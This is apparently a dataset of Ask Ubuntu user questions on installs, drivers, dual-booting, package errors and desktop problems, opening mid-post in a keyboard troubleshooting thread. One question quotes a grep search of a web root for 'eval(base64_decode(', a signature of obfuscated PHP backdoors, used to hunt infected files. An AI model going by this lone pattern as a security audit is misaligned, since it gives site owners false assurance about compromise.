forums and other resources , nothing i 've found so far helps . here 's what i did during the initial troubleshooting phase : rebooted windows 7 , from a cold start . no change . verified slow keys ( accessibility option ) is disabled using documented methods . no change . tried different keyboards on the host system . no change . re-installed the virtualbox guest additions ( as root ) several times no change . launched other guest ubuntu os instances in virtualbox . keyboard works fine in other guests . so i do n't think this is a virtualbox host plumbing problem . edit : and ( per obsessivessoâ˛ suggestion ) uninstalled ubuntu guest additions by running /opt/vboxguestadditions-4.2.6/uninstall.sh as root and rebooting . no change . i 'm lost here . what else should i check to diagnose a keyboard problem like this in ubuntu ? i 'm thinking it 's a driver or configuration problem . are there specific logs or utilities that might help pinpoint this problem ? edit1 - f-lock key not the problem update : a bit more searching revealse these resources : virtual terminal not working is the lame f-lock key causing the problem ? no , that 's the first thing i checked , and plugging in an older usb keyboard that does n't have the f-lock key -- no change . but it mentions using evt to monitor events , and additional resources ... a mail archive discussing the f-lock key virtual terminal key breakage ... using sudo chvt 1 , i am able to access a virtual terminal and the keyboard input works in the virtual terminal . perhaps this is an x keyboard mapping problem ... edit2 - xev shows now keyboard events xev shows no keyboard input events . strange . edit3 - upgrade to 12.04 fixes keyboard input , slow keys may be triggered silently 'upgrading ' the virtualbox guest instance to 12.04 ( precise ) 'fixed ' the problem . but this does n't tell me why the problem existed in the first place , though now i know it 's not a virtualbox problem . in addition , i found this freedesktop.org issue of recent vintage and this redhat issue indicating that the slow keys feature may have been triggered somewhere silently with no log entry , and that changing the settings to disable slow keys may not actually disable it . the investigation continues ... edit4 - verify low-level keyboard input running hd /dev/input/by-path/platform-i8042-serio-0-event-kbd as root shows incoming data when keys are pressed inside gnome desktop . source : superuser.com edit 5 - /lib/udev/findkeyboards shows no keyboards following the ubuntu wiki 's hotkeys troubleshooting advice through step 5 -- per fixing broken keys in /usr/share/doc/udev/readme.keymap.txt , running /lib/udev/findkeyboards ( as normal user or root ) shows no output ( exits with no messages . ) edit 6 - giving up ( for now ) i do n't have time to figure this out , so i 'm going to create a new virtualbox guest with 12.04 and migrate to that version . i 'll keep the old instance around to ease the transition . if someone posts troubleshooting suggestions , i 'll try them on my archived 11.04 ubuntu install and i 'll report the results here . thanks for the suggestions !
233167	how to resolve an error in wine relating to .net 2.0 ?	i 'm trying to install both neuroprogrammer 2 and 3 in wine . at first i got the error : please set registry key hklm\software\microsoft.netframework\installroot to point to the .net framework install location '' as described in this question . and so i installed .net , but now i get an error that says : neuro-programmer 2.exe - .net framework initialization error to run this application , you first must install one of the following versions of the .net framework : v2.0.50727 contact your application publisher for instructions about obtaining the appropriate version of the .net framework . this is the error i get after i installed .net 2.0 . therefore i decided to install .net 2.0 sp2 and still got the same error . any ideas ?
233168	ubuntu and windows 7 are installed in same drive , is it safe ?	i installed , ubuntu using windows installer in windows 7 os , will it create any problem , if i create partition of same drive .
233170	option for logging in with gui or cli	i am using a desktop with dual boot options windows xp and ubuntu 12.04 and i 'm able to use both the systems very well . is there any option/method so that instead of logging in to gui directly , ubuntu will ask me to boot either gui or cli ? is there a setting for this this ?
233172	how to regain 3d support on an integrated gpu after installing ati proprietary drivers ?	i recently installed ubuntu 12.04 lts on my laptop . after configuring everything , i installed the ati proprietary drivers ( version 12.10 ) . the dedicated gpu works perfectly fine and i get more than 4000 fps in glxgears . however , when i use sudo aticonfig -- px-igpu to switch to the integrated gpu and reboot my pc , unity does n't seem to work at all . i only see the background and desktop icons . no panels , no dock . when i try to run gnome shell , it runs in 2d mode even though i choose the 3d one . i get around 70 fps in glxgears . i 'm using a dell inspiron 15r with an ati mobility radeon hd 7650m and an intel hd graphics 4000 ( ivybridge ) gpu .
233177	error in using http through telnet on terminal	to access www.ietf.org/rfc.html , i entered the following commands : telnet www.ietf.org 80 > log get /rfc.html http/1.1 host : www.ietf.org while i was in the midst of typing the 3rd command , the following message displayed : connection closed by foreign host . the log entry was : > trying 64.170.98.30 ... connected to www.ietf.org . escape character is '^ ] ' . http/1.1 400 bad request date : thu , 27 dec 2012 09:32:01 gmt server : apache/2.2.10 ( linux/suse ) mod_ssl/2.2.10 openssl/0.9.8h php/5.2.13 with suhosin-patch mod_python/3.3.1 python/2.6 mod_wsgi/3.3 mod_perl/2.0.4 perl/v5.10.0 content-length : 226 connection : close content-type : text/html ; charset=iso-8859-1 < ! doctype html public `` -//ietf//dtd html 2.0//en '' > < html > < head > < title > 400 bad request < /title > < /head > < body > < h1 > bad request < /h1 > < p > your browser sent a request that this server could not understand. < br / > < /p > < /body > < /html > so what 's the problem ?
233179	why does wubi fail with a 404 error ?	i 'm installing ubuntu using the wubi installer , but it ends unexpectedly with following error : 12-27 15:15 debug downloader : downloading http : //releases.ubuntu.com/11.04/ubuntu-11.04-desktop-amd64.metalink > g : \ubuntu\install 12-27 15:15 debug downloader : download start filename=g : \ubuntu\install\ubuntu-11.04-desktop-amd64.metalink , url=http : //releases.ubuntu.com/11.04/ubuntu-11.04-desktop-amd64.metalink , basename=ubuntu-11.04-desktop-amd64.metalink , length=28363 , text=none 12-27 15:15 debug downloader : download finished ( read 28363 bytes ) 12-27 15:15 debug downloader : downloading http : //releases.ubuntu.com/11.04/md5sums-metalink > g : \ubuntu\install 12-27 15:15 error tasklist : [ errno 14 ] http error 404 : not found traceback ( most recent call last ) :
233181	retrieve windows 8 product key from mainboard	my new laptop came preinstalled with windows 8 . naively , as i am , i just formatted the harddrive and installed fine old ubuntu . now i want to install windows 8 for dual boot again , but i have no dvd and do download the iso one needs a product key . that key is not on the back of the laptop anymore but somewhere on the mainboard . is there any way to recover the product key from the mainboard using ubuntu ?
233182	my usb is blank on boot screen	so i just got a new toshiba satellite , running windows 8 . i made sure to use the universal usb maker , ( forgot the name but it was the one recommended ) and it seems to be fine ... . it has all the files on it and everything . i made sure in my bios the usb option was first , but it has nothing next to it ( i presume it should say usb : e drive etc ) then when my computer restarts ... nothing . please help and im using ubuntu 12.10 , and ive watched hours of videos . thanks ps : its a lexar usb stick with 16 gigabytes of memory
233186	installing new application	i got few linux applications from a chip ( magazine ) cd i wanted to try ( especially vlc and a few others ) , but did n't know how to install them . i saw a button named install it gives me some info but i ca n't install things like i used to with windows . i installed a few with software center , but my network connection is slow and it took me more than a hour to download an install a 10mb software . so please tell me how to install such software .
233190	what exactly does `update-alternatives` do ?	what is the command update-alternatives used for ? take this example : sudo update-alternatives -- install /usr/bin/java java /usr/local/java/jre1.7.0_09/bin/java 1 what does it do ? how is it different from adding jdk to the path ? let 's say that i have run the command . how would i revert back to the original state ?
233191	how to purge psmouse-alps-dst-0.4 driver ?	after installing psmouse-alps-dst-0.4 driver for my dell 5720 touchpad from here : http : //www.dahetral.com/public-download i decided to uninstall it . i removed /usr/src/psmouse-alps-dst-0.4 folder , removed psmouse from dkms and did sudo rmmod psmouse followed by modprobe psmouse proto=imps , driver works as default one but after reboot alps one is still here . after i did it all xinput command gives me the following : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] but after restart driver is still there and xinput gives me the following : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=14 [ slave pointer ( 2 ) ] where alpsps/2 alps glidepoint is actually a device i would like to remove . how can i fix it ? i want to uninstall it completely from my system and use default driver like before . thanks ! : )
233195	route complete tld ( *.dev for example ) to 127.0.0.1	for development purposes i want all dns requests to the .dev tld to forward to my own pc . the hosts file does not suffice . i use multiple domains and also multiple subdomains . i would have to add a line for each combination . i have read that a dns forwarder like dnsmasq can be used to do the job ( for example as described here ) . also this software is already installed on ubuntu 12.10 . the problem is that i fail to see how and where i should configure dnsmasq , i.e. , where i should put this line : address=/dev/127.0.0.1
233196	libreoffice calc copying rows containing a specific value in column a	using libreoffice calc i need to select and copy ( or just select and i will manually copy it ) from sheet1 to sheet2 just the rows containing in the column a the value 0 may you please help me ?
233199	how to add medibuntu public key ?	this is the error i get when updating ubuntu : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //packages.medibuntu.org precise inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 2ebc26b60c5a2783 w : failed to fetch http : //packages.medibuntu.org/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-i386/packages 404 not found w : some index files failed to download . they have been ignored , or old ones used instead . what should i do to resolve this ?
233200	how to increase icon size of xfce4-panel window buttons ( panel-tasklist-menu )	after searching for a solution for a few days , i believe that this could be a bug . after increasing the height of the xfce-panel i noticed , that the icons of the window buttons remained small . because this looks stupid and makes recognizing the icons harder than it has to be i want to increase the icon size of the window buttons of my xfce4-panel . i am running linux mint 14 xfce , but this should affect everyone running xfce 4.10 . the xfce docs tell me that i `` can set a custom icon size in gtk-icon-sizes with the name panel-tasklist-menu . the default icon size is 16px '' . -- source . as far as i can tell this can be done in a few different ways : using the graphical settings editor to customize the settings stored by xfconf to add in the xsettings the property iconsizes panel-tasklist-menu=32,32 ( or maybe just panel-tasklist-menu=32 ) editing ~/.config/xfce4/xfconf/xfce-perchannel-xml/xsettings.xml directly , doing basically the same thing adding gtk-icon-sizes= '' panel-tasklist-menu=32,32 '' to ~/.gtkrc-2.0 adding this to the gtkrc of my theme ( /usr/share/themes/mint-x/gtk-2.0/gtkrc ) as you can guess nothing worked . now after a while of blind trial & error trying to guess the correct way to define the icon size , i surrender . i was able to change the size of pretty much all the other icons on the panel , but still the size of the window button icons eludes me . has anyone an idea how i can increase the icon size of the xfce4-panel window buttons ? or should i send a bug report ?
233204	how can i list all files and folders beyond a specified size limit ?	in a partition i have several files and folders , and i can list all those file sizes with du like this : du -h but how can i list all the files which are beyond a specific disk space size like 5mb ?
233211	what if i install ubuntu in a laptop that has a recovery partition ?	if i install ubuntu dual-boot on laptop that has recovery partition will it become useless the recovery option provided by the bios and accessibility of recovery partition ?
233217	encrypting fat32 with luks	in previous versions of ubuntu i was able to encrypt usb flashdrives using the disks tool in any format i pleased . now unfortunately i am only able to encrypt a flash drive in ext format . this is bothersome as when the flashdrive is taken to another machine it will not allow the user accessing it to have ownership of the files . how would i encrypt a flashdrive using luks + fat ?
233219	how do i contribute an autopilot test ?	what is autopilot and how do i contribute to a new autopilot testcase for a package ?
233221	do i need an ubuntu compatible router ?	im ' thinking about formatting my hd and reinstalling with ubuntu instead . however i 'm concerned about losing internet access . i currently use xp and connect to the net via a router which i can access by typing its ip address into my browser . will there be any compatibility issues with ubuntu doing the same ? do i need an ubuntu compatible router or something , or any special software to setup internet access using ubuntu ?
233222	how can i disable the dns that network manager uses ?	ubuntu uses a dnsmasq instance for network manager starting in 12.04 - how can i disable it ?
233225	claws mail : filtering windows problem in unity ?	i have been informed , via the claws mail users ( e-mail ) list , that the following issue may be unity-related . comments / ideas / suggestions ? thanks . original question : often when i am editing or creating a filter in claws mail and i make a mistake , the filtering window / dialog windows will not respond to mouse clicks ( ok ; cancel ) . hence , there is no way to close these windows . i can minimize every window , super-window to see all windows on that desktop , etc. , so a hidden window does not appear to be the issue . when this issue arises ( often ) , the only way to get rid of these windows is kill claws mail using the system monitor , then restart cm . suggestions ? thanks ... fyi : replies / followups , from the claws user list ( oldest first ) : reply 1 ( another cm user ) . stuff like that happens to me on ubuntu 11.10 linux all the time . it 's especially annoying on the quick search search construction window , which if you do it slightly wrong , gives you an error message box with an ok that clicking does nothing to . reply 2 ( me ) . this is exactly the behavior i am describing . it has been an ongoing occurrence / annoyance for some months ( probably since some cm update ) . reply 3 ( claws mail development / support team ) . do you use unity ? this seems to only occur when using unity . reply 4 ( me ) . yes , ubuntu 12.04 lts with unity . reply 5 ( claws mail development / support team ) . unity is the problem . not sure if we can do anything about that , but it does n't look good .
233228	capture moving images with multiple webcams	i am trying to capture images when there is any movement involved using 2 webcams , each one pointing at different angles . i started to try motion but i am starting to believe is only for a single webcam . is it for multiple ? and if not , what other terminal or gui app is there to capture only when movement is involved from 2 or more webcams ?
233235	how do i run update_java_home.sh ?	the following is an extract of an instruction manual : if java is reconfigured after sav for linux has already been installed , the java_home value in /etc/symantec.conf must be updated . this can be done manually , or automatically by running /opt/symantec/symantec_antivirus/update_java_home.sh how do i run update_java_home.sh ? what specific commands must i issue ? what does the file extension .sh mean ? i am new to linux and ubuntu and would welcome detailed instructions on how to run update_java_home.sh
233236	problem with pdf file and document viewer	i downloaded this file from ieee website using my institute subscription , http : //ieeexplore.ieee.org/ielx5/4629386/6365209/06042853.pdf ? tp= & arnumber=6042853 & isnumber=6365209 my document viewer version 3.6.0 terminates every time i cross page number 4 , any help or reason why this happens ? i tried changing the extensions to odt and doc , liboffice draw opens the files , but they are n't clear ,
233239	downloading a boot disc	where can i download a copy of ubuntu to burn as a boot disc i can install from after formatting the hd > all i can find is the wubi file , which is from within windows . also it has no iso file to burn to dvd .
233242	how do i establish a webdav connection in gnome 3 ?	in nautilus from gnome 3 , the connect to server dialog is missing the type field . how can i establish a webdav connection ?
233245	java 1.7 bugs affect ubuntu too ?	i remember hearing bad things about java 1.7 on windows and os-x , but are the same security holes present in ubuntu ?
233248	the /boot partition in my server is full , how can i re-size it without re-installing the whole system ?	i 'm having some troubles because the partition in which /boot is allocated in my server is full , so i can install neither new linux images nor upgrades . here is the server 's file system usage information : $ df -th filesystem type size used avail use % mounted on /dev/mapper/pcm-root ext4 442g 83g 337g 20 % / udev devtmpfs 7.9g 4.0k 7.9g 1 % /dev tmpfs tmpfs 3.2g 320k 3.2g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 7.9g 0 7.9g 0 % /run/shm /dev/sda1 ext2 228m 225m 0 100 % /boot the specific question is how i can manage to solve this issue without re-installing the system ( that is what i 'm gon na do if everything else fails ) ?
233258	does dm-crypt have a gui for creating encrypted containers ?	on windows , i would always use truecrypt to perform full-disk-encryption and to create encrypted containers that i can put files in . on 12.10 , ubuntu uses dm-crypt to perform full-disk-encryption . i 've read online that dm-crypt can also be used to create encrypted containers . i 'm interested in using dm-crypt to create encrypted containers on ubuntu . does dm-crypt use a gui for this ( noob friendly interface ) ? or is dm-crypt cli ? i 've tried looking for dm-crypt in synaptic , dash , bash : man dm-crypt . but nothing shows up . so i 'm not even sure how to access/install it ( to see if it has gui/cli ) . i 'm using 12.04 .
233259	is there a way to request support for web applications not currently supported ?	i 'm enjoying 12.10 's webapp integration , and i 'm curious how new web applications will be added to the list of supported sites . ( a list can be found in the answer to how do i use ubuntu 's web application integration ? ) i 'd love to see stackexchange , github , and especially and microsoft outlook web app added to that list . is there a way that requests can be made ?
233260	packaging system broken due to missing `/var/lib/dpkg/available` file	when i want to install a program , i 'm unable to . for example : pooya @ pooya : ~ $ sudo apt-get install vlc debconf : apt-extracttemplates failed : no such file or directory extracting templates from packages : 100 % dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 )
233261	hdmi not working on ubuntu acer c7	just purchased the chromebook acer c7 and installed ubuntu 12.04 . however , when i plug in the hdmi cable to my tv the sound does not come through the tv but rather the laptop . i have searched the everything regarding this subject but have not found anything . please help !
233262	update manager - failed to load package list	come to do some updates in 12.10 today and get the error e : malformed description-md5 line ; includes invalid character 'd72e12fa21290d21a54b'4e8480abad1 ' , e : malformed description-md5 line ; includes invalid character 'd72e12fa21290d21a54b'4e8480abad1 ' , e : the package lists or status file could not be parsed or opened . this is from either update manager or apt-get ( which gives a bit more info ) malformed description-md5 line ; includes invalid character 'd72e12fa21290d21a54b'4e8480abad1' malformed description-md5 line ; includes invalid character 'd72e12fa21290d21a54b'4e8480abad1' the package lists or status file could not be parsed or opened . ca n't call method `` policy '' on an undefined value at /usr/bin/apt-show-versions line 56 . e : problem executing scripts apt : :update : :post-invoke-success 'test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i' e : sub-process returned an error code any suggestions as to what has gone wrong and how to get round it ? cheers iain
233275	how to dual-boot ubuntu + windows 8 on a samsung series 9 laptop ?	i have a samsung np900x4c which came with windows 8 installed . my goal is to have a dual-boot setup . i followed pretty much the answer at samsung series 9 np900x4c-a03us dual boot windows 7 , namely : disabled secured boot in bios changed `` os mode selection '' to csm os* booted from the usb and installed ubuntu 12.10 *- with uefi + csm os i got some kernel panic errors while booting from the usb the problem - i can only dual boot if i change the boot type in the bios : with csm only i get the grub options and i can boot in ubuntu . if i select the windows 8 option i get a windows error message** and ca n't boot . with csm + uefi os or uefi only i boot straight into windows 8 **- windows boot manager - windows failed to start ( ... ) . the boot configuration data for your pc is missing or contains errors . it seems like i have the traditional grub installed and uefi boot installed and i ca n't have both working simultaneously . how can i correct this dual-boot setup ? if i did install ubuntu on legacy bios and should n't have , how do i correct that ?
233277	when a bluetooth audio device auto-connects volume settings wo n't work until i manually select it	i have an asus ux32vd running 12.10 and for audio i 'm using a big jambox . they 're paired and connect quickly every time . it also correctly directs audio to the jambox every time it connects . the problem is that when the jambox connects the volume keys and volume control indicator applet do n't work . when i open the volume control app after the jambox connects it is unselected ( despite playing the audio already ) . once i select it then the volume control works as it should . this would n't be a problem were it for but one thing - it defaults to max volume . which is a problem with a big jambox . so the question is how do i get the volume control app to accurately reflect what the system is already doing ?
233280	gnome-terminal reports $ term to be `xterm`	on a clean install of ubuntu 12.10 , the default gnome-terminal is reporting $ term to be xterm where it should really be reporting xterm-256color . what is the best way of changing this ? i 'm avoiding putting this in my .bashrc as that 's just asking for trouble .
233283	if i buy world of goo in software center can i install it on my 2 ubuntu machines ?	considering buying world of goo from ubuntu software center , but not sure what happens after that . all my computers use the same ubuntu sso account - does this mean i can install it on more than one machine for the one fee ?
233294	`` can not access secondary gpu '' error on a lenovo y580	i 've laptop with nvidia optimus technology . i 'm trying to run the nvidia graphic card ( ubuntu 12.10 32bit ) . i did everything from this tutorial http : //blog.urosevic.net/2012/10/13/2567/lenovo-ideapad-y580-nvidia-gtx-660m-ubuntu-12-04/ but still have error : optirun -vv glxspheres [ 1285.268398 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1285.269054 ] [ info ] configured driver : nvidia [ 1285.418607 ] [ debug ] optirun version 3.0.1 starting ... [ 1285.418648 ] [ debug ] active configuration : [ 1285.418658 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1285.418667 ] [ debug ] x display : :8 [ 1285.418676 ] [ debug ] ld_library_path : /usr/lib/nvidia-current : /usr/lib32/nvidia-current [ 1285.418685 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1285.418694 ] [ debug ] vgl compression : proxy [ 1288.019770 ] [ info ] response : no - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 1288.019790 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 1288.019799 ] [ debug ] socket closed . [ 1288.019807 ] [ error ] aborting because fallback start is disabled . [ 1288.019811 ] [ debug ] killing all remaining processes .
233295	how do i restore the file progress dialog after closing it ?	i was copying a iso from my pc , accidently closed the window , and now the progress windows is away . how can i bring it back ?
233296	why am i seeing `` freezing tabs '' in chrome after upgrading to ubuntu 12.04 ?	i just upgraded my system to ubuntu 12.04 on fri. , everything works great but chrome is giving me issues with most pages . http : //i.imgur.com/pusx6.png http : //i.imgur.com/zeerk.png as you can see the graphics in that tab are frozen sort of . if i switch tabs after loading the page and go back to that tab then it looks fine . but for instance on fb if i scroll down and play with any menu item or the advisory icons at the top , it wo n't popup . i have to switch screens and come back and it then comes up that menu item . chrome version is 23.0.1271.97 . i ca n't figure out if this is an issue with the latest chrome and how to fix or if this is an xfce problem or graphics card problem . i can play games just fine so i do n't think it 's that . i do remember that in gnome before switching over to xfce under the new ubuntu i had window cutting problems while dragging windows over the desktop . but xfce does n't have this problem . also if i open any of the pages i have problems with in ff i do n't have these same problems .
233297	i used wubi to install ubuntu to the external hard drive , but when i reboot it shows only windows xp	i have a windows xp computer , wubi was downloaded into my external hard drive , this was the first time that wubi fully downloaded and told me to reboot , but when i did it automatically went to the windows xp menu screen . help ! ?
233305	grep command not returning all results	i am running the following command but not all files that i know have this string are being returned and i can not work out why . specifically the apache log files which are under this path are not being returned . grep -rl `` eval ( base64_decode ( ' '' /var/www | xargs ls -l can anyone point me to what i need to change to get these files returned too ?
233312	how to make keyboard backlight fn buttons work in samsung series 9 ?	i 've just installed ubuntu 12.10 on my samsung 900x4c . however , i ca n't get the keyboard backlights to work . i added the keymaps as per community docs - samsung series 9 ( section function keys ) . but regardless of pressing fn+f9 or f10 ( backlight decrease/increase ) , i get : no lights in keyboard toggler in top right corner always pops-up as maxed out ( i.e. , `` full light '' ) how can you fix the keyboard backlight ? the fan button ( fn+f11 ) does n't work either , if you also know about that one it would be great .
233315	why will ubuntu 12.04 lts not boot with a megaraid sas 9240-4i ?	i have a megaraid sas 9240-4i . after i add this card to the pci-port motherboard ( asus p8z77-v pro ) my ubuntu 12.04 lts will not boot . if change to grub recovery mode i get this error : timeout : killing /sbin/modprobe -bv pci : v00001000 ... ... please help me solve this problem !
233317	how do i change the startup sound ?	note : this is not a duplicate . the above question refers to the sound played at login and not the sound at the login screen . is there some way to change the sound that is played when the login screen is displayed ? currently it 's a short drum beat . note that i am not referring to the login sound , which in ubuntu 12.04 is no longer enabled by default , but the much shorter sound at the login screen .
233318	adobe flash player is not working in ubuntu 12.04 lts	adobe flash player is working no more in ubuntu 12.04 lts . how can i install or fix it for watching youtube or similar online streamed videos ? ? kindly inform me .
233320	why ca n't i boot from a usb ?	i generated a brand new ( reformatted ) usb key to boot on ubuntu . i generated the usb key using the internet procedure accessing it from a windows 7 pc with google chrome . i generated the usb key successfully . now i insert my usb key , called pendrive ( f : / ) automatically , in my other laptop ( installed on ubuntu 8 , but i can not just upgrade since the internet connection does not seem to work ) . unfortunately my computer i want to re-install on the new ubuntu has not the possibility to boot on the usb port ( if i click on f12 i have 3 options : hdd , dvd , external disk ) , therefore it boots on ubuntu 8 . no pb , i can try to reboot after . but when i enter the usb key , the system detects it is a bootable key , and requests if i want it to autorun . i answer yes , of course , and it says `` can not find autorun.exe '' if i look in the key , there is file called wubi.exe , but it seems the system does not identify it .
233325	how do i get 10.04 to load with refit ?	i installed 10.04lts on my 2007 imac ( which already has bootcamp and windows xp ) according to the instruction listed : https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation now , when i select the linux boot from refit , i get a boot error : something like `` no boot ... .. '' i did a partition inspector analysis using refit and this is what it brings back : *** report for internal hard disk *** current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 134871711 mac os x hfs+ 3 134873088 136970239 linux swap 4 558252072 625142407 basic data 5 136970240 558252031 basic data current mbr partition table : # a start lba end lba type 1 1 409639 ee efi protective 2 409640 134871711 af mac os x hfs+ 3 134873088 136970239 82 linux swap / solaris 4 * 558252072 625142407 0c fat32 ( lba ) mbr contents : boot code : unknown , but bootable partition at lba 40 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 1 , type efi system ( fat ) partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 2 , type mac os x hfs+ listed in mbr as partition 2 , type af mac os x hfs+ partition at lba 134873088 : boot code : none file system : unknown listed in gpt as partition 3 , type linux swap listed in mbr as partition 3 , type 82 linux swap / solaris partition at lba 558252072 : boot code : windows ntldr file system : fat32 listed in gpt as partition 4 , type basic data listed in mbr as partition 4 , type 0c fat32 ( lba ) , active partition at lba 136970240 : boot code : grub file system : ext4 listed in gpt as partition 5 , type basic data how can i get my linux partition to boot ?
233328	tool for monitoring usb	i need to develop a tool in c which will detection & and removing of the usb include accessing time of the users . so anyone will copied or use my machine that need to show like demon process
233329	blank screen upon boot , but no grub menu !	thanks and any help would be much appreciated . hp pavillion dv6 notebook : < 6 months old i5 processor dual integrated graphics 8 gb ram 750 hdd currently running w7 i have a bootable usb drive 12.04.1 lts ( i know its fine , because it works with any other computer ) , and i need it to work on my hp notebook . i have already updated my bios and changed boot sequence . i plug in the usb , and wait for my pc to read and initiate the boot . the light on the usb flickers ( a good thing ) , but then suddenly stops ( in other computer , it keeps flickering ) . at this point , my screen is almost fully black . no cursor , or image of ubuntu logo or even the grub . i tried entering grub : e , alt + cntl +f4 , ctl + x -- everything . no response . also after about 6 seconds upon reaching the black screen , my laptops , fan , or something go off to quite loud : if that helps . i read similar issues , but those atleast are able to reach grub ; i can not . thx , any help whatsoever would be greatly appreciated . p.s : im not new to ubuntu , as i have used plenty of ubuntu 10 , and had the exact same problem . it worked on everyother computer .
233334	filesystem locks up ( read-only ) after hdd - > ssd clone , no sudo access , no applications	i recently cloned my old hdd to a new smaller ssd and something must have gone wrong . windows 7 works absolutely fine , but ubuntu 12.04 has issues - at first , it works normally , but after only a minute or less the filesystem locks up . i ca n't open any applications other than the dash and file managers , if i try a sudo command in console i get a read-only error on /var/lib/sudo/alex . other problems like this generally seem to be related to an old or degrading hard drive , but that ca n't be the case as my ssd is brand new . i launched recovery mode and used fsck , it found a few errors but it did n't fix the problem . here 's the steps i used to clone my hdd to the ssd ( did it partition by partition ) : 1 ) cloned windows recovery ( sda1 ) and windows ( sda2 , boot ) to the ssd with clonezilla . 2 ) copied the linux ( sda3 ) and lenovo-part ( sda4 , diag ) partition to the ssd with gparted live . 3 ) got the windows boot manager error on startup , used a recovery disk to restore windows ' boot manager ( windows works fine now ) . 4 ) used an ubuntu live usb and the boot-repair utility to install grub2 to : sda and sda3 ( it did n't offer sda2 , which is the boot drive , but grub seems to work fine ) . it may be that copying the partitions using gparted misses some crucial information or is messy but i have no idea why that would be . that being said , windows works fine and i used clonezilla for it , whereas i used gparted for linux . this is for a laptop so setting it up to clone requires taking apart my desktop and pulling a bunch of plugs so i 'd only like to do that if i knew it would work right . any thoughts on the matter ?
233339	microcode problem	i recently got this error when trying to start up ubuntu 12.10 microcode : failed to load file amd-ucode/microcode_amd.bin it then starts up put i cant see any of the unity . i can however press ctrl+alt+t and get the command line to get up . how should i solve this ?
233340	can i access a windows 8 crashed partition from ubuntu ?	i had installed windows 2-3 days before . on my laptop , there was only one drive . because i wanted to partition it , i installed application called easeus partition master . but because my windows 8 crashed and i do not have dvd with me , i just want to take a backup of one folder which is very important to me . i was searching all over the internet . i installed ubuntu so that i could access that folder and take a backup . is there any was to access that folder for taking a backup ? i googled it and i got couple of results from here as well but with no avail . edit : i do not have dvd from where i installed the windows 8 . so it means that i can not repair it . i have installed ubuntu on another partition with the option install ubuntu along with windows 8 yet i can not access the partition of windows 8 . the error is can not mount the partition . when i googled it , i got this found this question and i tried for this answer . but i had no luck with it as well . i just want to copy a folder in c : / drive where i installed windows .
233341	why is the 12.10 version linking to the 12.04 version ?	where is the proper download for a bootable disc please ? i do n't want wubi .
233342	ubuntu 12.10 battery monitor problem ?	with win7 i had about 4hrs battery life . my battery was fully charged and i had my laptop plugged in during the entire install of ubuntu . however , about 15 minutes after unplugging my laptop i get a message that says i only have 19 minutes of battery left . so now instead of 4 hours of battery i only have 45 minutes max . wtf ? everything i 've researched so far seems to say things like `` change your power settings '' `` dim your screen '' etc . but none of these 'solutions ' would in anyway account for a missing 3 hours of battery life . so is this an issue with the battery monitor itself ? how do i fix this ? i came to ubuntu because i 'm starting to learn some programming and my win7 was gettting too buggy . i really do n't want to go back now that i 've seen what ubuntu is , but i ca n't function with only a half hour battery that i know will last at least 3 hours . please help !
233350	how do i install tor browser on ubuntu 12.10 ?	i downloaded tor browser x86 from it 's official website , it is a 30 mb .tar.gz file . how can i install it now ?
233353	deleting old windows files through ubuntu	i had a pc with windows vista on and then got a new laptop so i installed ubuntu onto the vista pc using the usb installer ( i didnt really know what i was doing just messing about i dont know a lot about this stuff however im competent with computers and such , enough knowhow to build a pc ) . since then for some reason windows has become corrupted and wont launch so i cant go in to delete the files to clear up space as there is very little space left . is there a way i can do this through ubuntu ? edit : its dual boot as it gives me the option to choose but the vista one doesnt actually work for some reason , system restores and fixes failing . i cant see any of the files for the vista side from within ubuntu to delete them in the first place .
233356	the battery of my laptop is maybe in danger ?	in windows 7 , the battery of my core i7 vaio would always only charge until 79 % however , in ubuntu it charges 100 % i heard from a friend that it is dangerous for battery to become charged fully and stays that way while the charger is still plugged in . i always have my charger plugged in . so is there a danger to my battery ? or is there a way to manage battery options ?
233359	gnome stucks to fallback mode after installing nvidia drivers failed	i have dell inspiron r15 n5110 laptop . i tried to install nvidia drivers available at www.nvidia.com . the installation failed . after that gnome stucks to the fallback mode . how to restore default gnome 3.6 environment ?
233363	install ubuntu 12.10 on uefi along windows 8	hello i want to install ubuntu 12.10 on an uefi machine with manual partitioning . do i have to disable `` secure boot '' ? do i have to create a 2nd esp ( efi system partition ) for ubuntu ? do i have to give it the boot flag ? do i have to set mount point /boot/efi ? do i have to install grub on /dev/sda ? i am used to bios installation where : /dev/sda1 100 mb windows 7 hidden system partition /dev/sda2 200 gb windows 7 c : \ drive /dev/sda3 115 gb linux ext4 root /dev/sda4 2 gb linux swap grub-install /dev/sda update-grub
233372	gnome mail icon not showing up on system tray	i recently wiped my drive and re-installed 12.04 then upgraded back to 12.10 . my mail icon that is supposed to be there is not . what do i do ?
233378	how do i become a `` superuser '' ?	the following command fails with an error : $ dpkg -i libmotif*i386.deb dpkg : error : requested operation requires superuser privilege how do i become a superuser ? i thought i was the superuser ?
